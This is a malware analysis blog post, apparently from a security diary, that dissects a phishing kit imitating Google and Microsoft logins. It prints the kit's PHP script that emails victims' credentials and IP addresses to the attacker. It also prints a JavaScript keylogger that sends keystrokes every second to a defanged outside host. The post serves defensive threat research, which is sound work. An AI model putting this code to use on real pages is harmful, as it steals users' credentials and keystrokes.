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Phishing Kit with JavaScript Keylogger

Published: 2019-02-07. Last Updated: 2019-02-08 05:43:40 UTC
by Xavier Mertens (Version: 1)
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Here is an interesting sample! It’s a phishing page which entice the user to connect to his/her account to retrieve a potentially interesting document. As you can see, it’s a classic one:

The HTML file has a very low VT score (2/56) [1]. I wrote a YARA rule to search for more samples and found (until today) 10 different samples. The behaviour is classic: Data provided by the victim in the HTML form is send to a compromized host where the phishing kit was deployed. Each sample has a different URL. I was lucky to find the complete kit still available in a zip archive on one of them:

$ shasum -a 256
$ unzip -t
    testing: fileout/google.png       OK
    testing: fileout/login.php        OK
    testing: fileout/login2.php       OK
    testing: fileout/verification.html   OK
No errors detected in compressed data of

'login.php' is a very simple script that just forwards the stolen credentials to the bad guy via email:

$ cat -n login.php
     1    <?php
     2    $ip = getenv("REMOTE_ADDR");
     3    $email = $_POST['Email'];
     4    $password = $_POST['Passwd'];
     7    $login = "Email Address : ".$email;
     8    $pass = "Password : ".$password;
     9    $target = "IP victim : ".$ip;
    12    $head = "########### Login info ############";
    13    $foot = "####### Indramayu CyBer ###########";
    14    $body = "Googledoc Login Information";
    15    mail(“<redacted>", "$body","$head \n$login \n$pass \n$target \n$foot");
    16    header("Location: verification.html”);

As you can see, the victim will always be redirected to a second page (‘verification.html’) that will ask for more information:

You'll probably spot the difference between the screenshots, the first page asks for Microsoft credentials, the second one asks verification details for Google. That's because the phishing kit was found on a different seerver than the one used by the initial page (when I took the screenshots).

The form calls a second PHP script (‘login2.php’) which sends another email with the recovery information. Ok, but what is different this time? There is another “feature” in the first HTML page: A JavaScript keylogger!

     1 var keys = '';
     3 document.onkeypress = function(e) {
     4    var get = window.event ? event : e;
     5    var key = get.keyCode ? get.keyCode : get.charCode;
     6    key = String.fromCharCode(key);
     7    keys += key;
     8 }
    10 window.setInterval(function(){
    11    new Image().src = ‘hxxps://wq14u[.]com/keylog.php?c=' + keys;
    12    keys = '';
    13 }, 1000);

This piece of code will grab keys pressed in the browser windows and send them to the malicious server every second. This technique is not very efficient because special keys are not properly sent and the same URL is called again and again until the user remains on the same HTML page (1 req/sec).

Now the question: Why stealing credentials via two different techniques? I found references to the URL starting around December 15th 2018. If you have more details about this technique, please share!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

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